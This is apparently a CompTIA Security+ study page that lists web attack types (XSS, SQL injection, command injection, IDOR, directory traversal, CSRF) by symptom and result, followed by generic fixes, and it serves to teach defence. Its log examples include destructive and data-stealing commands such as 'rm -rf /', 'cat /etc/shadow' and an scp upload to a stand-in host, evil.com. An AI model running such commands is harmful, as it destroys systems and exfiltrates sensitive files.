Fountain and plaques at a Buddhist temple.

Recognizing Attacks

Name, Symptom, and Result

CompTIA wants you to recognize common attack categories. You need to know simplified descriptions of their symptoms. And, know what they could lead to.

Cross-site Scripting / XSS

Symptom:
A page at "a popular social media site" contains:
<script ...></script>

Possible result:
It tricks your browser into sending an authentication cookie to a hostile server instead of the appropriate one.

SQL Injection

Symptom:
Log of transactions includes: ' or 1=1; --
or: "Strange punctuation marks"

Possible result:
Literally anything that could be done on a database server. Deleting database tables, deleting records, changing records, adding records, and so on.

Command Injection

Symptom:
The web server log contains requests that include command syntax.
Windows:
format c: /y
type \path\to\sensitive\file
Linux:
rm -rf /
cat /etc/shadow
scp /path/to-sensitive/file hacker@evil.com:
In both operating systems, spaces may be replace with %20.

Possible result:
Literally anything. The above likely examples show deleting entire file system and exfiltrating sensitive file contents.

Session Hijacking / Insecure Direct Object References

Symptom:
User Fred notices that when logged in to his bank the URL includes user=fred, so he changes it to his friend user=mary and reloads the page, and sees her data.

Possible result:
Now he's in a session as Mary, so he can do anything that she could do with her account.

Directory Traversal

Symptom:
Server log includes ../../ in requested URLs.

Possible result:
If the server allows itself to be tricked into climbing out of the web area, attacker can read and possibly execute files outside the web area.

Cross-Site Request Forgery / XSRF / CSRF

Symptom:
Malicious content within a popular page contains a malformed <img src="..."> object.

Possible result:
A third party is disadvantaged, to the advantage of the person who dropped that comment into an unfiltered comment area.

Fixes for All of These

The common problem is that user input is not properly sanitized or validated for size, syntax, or meaning.

Adding or fixing input data validation means modifying software, so always apply patches.

WAFs or Web Application Firewalls know about these, so use one to protect the web front ends to public-facing services.

To the Cybersecurity Page